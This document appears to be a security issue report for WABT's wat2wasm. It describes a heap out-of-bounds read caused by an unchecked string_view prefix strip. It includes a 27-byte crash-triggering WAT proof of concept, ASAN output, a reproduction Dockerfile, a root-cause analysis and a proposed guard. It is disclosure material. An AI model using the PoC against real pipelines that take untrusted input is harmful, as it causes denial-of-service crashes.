heap OOB read / SEGV in `BinaryWriter::WriteExpr` #2742

## Description of the vulnerability and its impact

When `wat2wasm` processes a WAT file containing a `@custom` annotation inside a function
body (e.g. `(@custom "a")`), `ParseCodeMetadataAnnotation` calls `name.remove_prefix(14)`
on the token text `"custom"` (6 bytes) without first checking that the name starts with
`"metadata.code."`. This violates the precondition of `std::string_view::remove_prefix`
(`n <= size()`), so the behavior is undefined. In practice it yields a corrupted
`string_view` whose pointer sits 14 bytes past the start of the token text (8 bytes past
its end) and whose length is `0xFFFFFFFFFFFFFFF8` (unsigned wraparound). The corrupted
view is stored in a `CodeMetadataExpr` node and later used as a key in
`std::unordered_map<std::string_view, CodeMetadataSection>` inside `BinaryWriter::WriteExpr`,
where the hash function attempts to read ~18 exabytes starting at an invalid address.

**Impact:** Deterministic crash (DoS) of any pipeline running `wat2wasm --enable-annotations`
on untrusted input. The corrupted pointer is heap-relative, creating a theoretical (but
non-trivial) memory disclosure primitive.

**First faulty condition:** `src/wast-parser.cc:2314` — `name.remove_prefix(sizeof("metadata.code.") - 1)` called without a prior `starts_with("metadata.code.")` guard.

**Crash site:** `src/binary-writer.cc:1189` — `BinaryWriter::WriteExpr` hashes the corrupted `string_view`.

---

## How to reproduce

```bash
echo '(module(func(@custom "a")))' > poc.wat
wat2wasm --enable-annotations poc.wat -o /dev/null
```

Crashes deterministically on current HEAD. No special heap layout or environment required.

**ASAN output:**

```
==10==ERROR: AddressSanitizer: SEGV on unknown address 0x603000010000
==10==The signal is caused by a READ memory access.
    #0 in std::_Hash_bytes(void const*, unsigned long, unsigned long)
    #1 in std::hash<std::string_view>::operator()
    #2 in std::unordered_map<std::string_view, ...>::operator[]
    #3 in wabt::(anonymous namespace)::BinaryWriter::WriteExpr
           /build/repo/src/binary-writer.cc:1189
    #4 in BinaryWriter::WriteExprList /build/repo/src/binary-writer.cc:1203
    #5 in BinaryWriter::WriteFunc    /build/repo/src/binary-writer.cc:1229
    #6 in BinaryWriter::WriteModule  /build/repo/src/binary-writer.cc:1737
    #7 in wabt::WriteBinaryModule    /build/repo/src/binary-writer.cc:1947
    #8 in ProgramMain                /build/repo/src/tools/wat2wasm.cc:152
```

For a full end-to-end reproduction, build and run the following Dockerfile:

```dockerfile
FROM ubuntu:24.04

ENV DEBIAN_FRONTEND=noninteractive
ENV TZ=UTC

RUN apt-get update && apt-get install -y --no-install-recommends \
    git \
    cmake \
    ninja-build \
    clang-18 \
    llvm-18 \
    libclang-rt-18-dev \
    python3 \
    ca-certificates \
    && rm -rf /var/lib/apt/lists/*

# Clone wabt at HEAD (unpatched as of April 2026)
RUN git clone --depth=1 --recurse-submodules https://github.com/WebAssembly/wabt.git /build/repo \
    && cd /build/repo && git log -1 --oneline

# Build wat2wasm with ASAN using clang-18
RUN mkdir -p /build/repo/build && \
    cmake -S /build/repo -B /build/repo/build \
        -GNinja \
        -DCMAKE_BUILD_TYPE=Debug \
        -DCMAKE_C_COMPILER=clang-18 \
        -DCMAKE_CXX_COMPILER=clang++-18 \
        "-DCMAKE_C_FLAGS=-fsanitize=address -g -O1 -fno-omit-frame-pointer" \
        "-DCMAKE_CXX_FLAGS=-fsanitize=address -g -O1 -fno-omit-frame-pointer" \
        "-DCMAKE_EXE_LINKER_FLAGS=-fsanitize=address" \
        -DBUILD_TESTS=OFF \
    && ninja -C /build/repo/build wat2wasm

# Embed the PoC: 27-byte WAT text that triggers the bug
RUN echo '(module(func(@custom "a")))' > /build/poc.wat

# Show the vulnerable source region and then trigger the ASAN crash
CMD ["/bin/sh", "-c", \
    "echo '=== Vulnerable source (src/wast-parser.cc — ParseCodeMetadataAnnotation) ===' && \
     grep -n 'remove_prefix' /build/repo/src/wast-parser.cc | head -5 && \
     echo '' && \
     echo '=== ASAN crash ===' && \
     ASAN_OPTIONS='detect_leaks=0:print_stacktrace=1' \
     ASAN_SYMBOLIZER_PATH=$(which llvm-symbolizer-18) \
       /build/repo/build/wat2wasm --enable-annotations /build/poc.wat -o /dev/null 2>&1; exit 1"]
```

---

## Which WABT tools or library functions are affected

- **Tool:** `wat2wasm`
- **Vulnerable function:** `WastParser::ParseCodeMetadataAnnotation` — `src/wast-parser.cc:2314`
- **Crash site:** `BinaryWriter::WriteExpr` — `src/binary-writer.cc:1189`

---

## Which WebAssembly features must be enabled

**`--enable-annotations`** — the crash is only reachable when annotation parsing is
enabled. The `@custom` token is only accepted under this flag.

---

## Root Cause Analysis

### Background

WABT's `wat2wasm` tool compiles WebAssembly Text Format (WAT) to binary. The `--enable-annotations` flag activates support for WAT annotations, which are syntactic extensions of the form `(@name ...)`. One annotation family is `metadata.code.*`, used to attach custom metadata to instructions for toolchain pipelines. For this feature to work correctly, the annotation name must begin with the 14-byte prefix `"metadata.code."`.

### Vulnerable Code

```cpp
// src/wast-parser.cc:2310 — WastParser::ParseCodeMetadataAnnotation
Result WastParser::ParseCodeMetadataAnnotation(ExprList* exprs) {
  WABT_TRACE(ParseCodeMetadataAnnotation);
  Token tk = Consume();
  std::string_view name = tk.text();
  name.remove_prefix(sizeof("metadata.code.") - 1);  // line 2314 — BUG
  std::string data_text;
  CHECK_RESULT(ParseQuotedText(&data_text, false));
  std::vector<uint8_t> data(data_text.begin(), data_text.end());
  exprs->push_back(std::make_unique<CodeMetadataExpr>(name, std::move(data)));
  EXPECT(Rpar);
  return Result::Ok;
}
```

**Plain explanation:** The function assumes that any annotation token reaching it begins with the 14-byte prefix `"metadata.code."` and strips that prefix unconditionally. When the token is `"custom"` (6 bytes), stripping 14 bytes is undefined behavior — it produces a `string_view` pointing past the end of the token buffer with a wrapped, near-maximal length.

**Precise explanation:** `sizeof("metadata.code.") - 1` is `14`. Calling `remove_prefix(14)` on a `string_view` of size 6 violates its precondition (`n <= size()`). In a typical standard library build without hardening assertions, the call advances the view's internal data pointer by 14 bytes (into adjacent heap memory or lexer state) and computes the new size as `6 - 14 = -8`, which as a 64-bit `size_t` is `0xFFFFFFFFFFFFFFF8`. The resulting `string_view` is stored, without copying, into `CodeMetadataExpr::name` (a `std::string_view` member). At binary write time, `BinaryWriter::WriteExpr` uses it as a key in `std::unordered_map<std::string_view, CodeMetadataSection>`, which hashes the view by calling `std::_Hash_impl::hash(data_ptr, 0xFFFFFFFFFFFFFFF8)`: a read of ~18 exabytes from an invalid address, which faults and is reported by ASAN as a SEGV.
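The size arithmetic can be checked in isolation. The sketch below is illustrative only: `SizeAfterUncheckedRemovePrefix`, `kToken`, and `kPrefixLen` are hypothetical names that do not exist in wabt, and the helper models just the unsigned subtraction. It deliberately never calls `remove_prefix` out of range, since that call would itself be undefined behavior.

```cpp
#include <cstddef>
#include <cstdint>
#include <string_view>

// Hypothetical helper (not part of wabt): models only the size computation of
// an unchecked remove_prefix(n), without building an out-of-range view.
constexpr std::size_t SizeAfterUncheckedRemovePrefix(std::size_t size,
                                                     std::size_t n) {
  return size - n;  // unsigned subtraction wraps modulo 2^N when n > size
}

constexpr std::string_view kToken = "custom";
constexpr std::size_t kPrefixLen = sizeof("metadata.code.") - 1;

static_assert(kToken.size() == 6);
static_assert(kPrefixLen == 14);
// 6 - 14 wraps to SIZE_MAX - 7, which is 0xFFFFFFFFFFFFFFF8 when size_t is
// 64 bits wide.
static_assert(SizeAfterUncheckedRemovePrefix(kToken.size(), kPrefixLen) ==
              SIZE_MAX - 7);
```

Because the checks are `static_assert`s, compiling the file as C++17 is enough to confirm the numbers; nothing needs to run.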

The root cause is the absence of a guard in `ParseCodeMetadataAnnotation` verifying that the annotation name actually starts with `"metadata.code."` before calling `remove_prefix`. A corresponding guard exists at module level (in the lexer's annotation token accumulation), but not in the expression-level dispatcher.
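One possible shape for the missing guard is sketched below. This is an assumption about how a check could look, not wabt's actual code or its eventual patch: `StripCodeMetadataPrefix` is a hypothetical standalone helper, and how `ParseCodeMetadataAnnotation` would report the failure to the user is left out. It compares against `substr` rather than using `starts_with` so that it stays valid in C++17.

```cpp
#include <optional>
#include <string_view>

// Hypothetical helper (not wabt's actual code): returns the part of an
// annotation name that follows "metadata.code.", or std::nullopt when the
// name does not carry that prefix.
constexpr std::optional<std::string_view> StripCodeMetadataPrefix(
    std::string_view name) {
  constexpr std::string_view kPrefix = "metadata.code.";
  // substr(0, n) clamps n to size(), so the comparison is safe for names
  // shorter than the prefix.
  if (name.substr(0, kPrefix.size()) != kPrefix) {
    return std::nullopt;
  }
  name.remove_prefix(kPrefix.size());  // precondition n <= size() now holds
  return name;
}

// The PoC token is rejected instead of producing a corrupted view.
static_assert(!StripCodeMetadataPrefix("custom").has_value());
// A well-formed name (illustrative) yields only the suffix.
static_assert(StripCodeMetadataPrefix("metadata.code.branch_hint") ==
              std::string_view("branch_hint"));
```

With a check of this kind, the parser could return an error for `(@custom "a")` inside a function body rather than creating a `CodeMetadataExpr`. The separate question of the stored view's lifetime is not addressed by this sketch.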

